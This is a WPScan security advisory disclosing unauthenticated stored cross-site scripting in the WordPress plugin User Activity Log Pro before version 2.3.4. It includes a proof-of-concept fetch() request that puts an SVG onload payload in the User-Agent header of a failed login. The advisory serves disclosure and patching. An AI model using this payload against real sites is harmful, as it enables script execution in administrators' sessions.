WordPress Plugin Vulnerabilities
User Activity Log Pro < 2.3.4 - Unauthenticated Stored Cross-Site Scripting via User Agent
Description
The plugin does not properly escape recorded User-Agents in the user activity logs dashboard, which may allow visitors to conduct Stored Cross-Site Scripting attacks.
Proof of Concept
1) Make sure the plugin's `Enable User Agent For Log` setting is set at /wp-admin/admin.php?page=ualp_settings
2) If you're logged onto the site, log out.
3) While still on the site, send the following fetch() command from your browser's console:
```
await fetch("/wp-login.php", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0<svg onload=alert(1)//>",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://vulnerable-site.tld/wp-login.php",
"body": "log=simpleadmin&pwd=invalidpassword&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1",
"method": "POST",
"mode": "cors"
});
```
4) Log back as an administrator, and go see the user logs at /wp-admin/admin.php?page=ual_pro. You should get an alert box, which indicates the attack succeeded.
Affects Plugins
Fixed in 2.3.4 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Bartlomiej Marek and Tomasz Swiadek
Submitter
Bartlomiej Marek
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-29 (about 7 months ago)
Added
2023-09-25 (about 7 months ago)
Last Updated
2023-09-25 (about 7 months ago)
WPScan 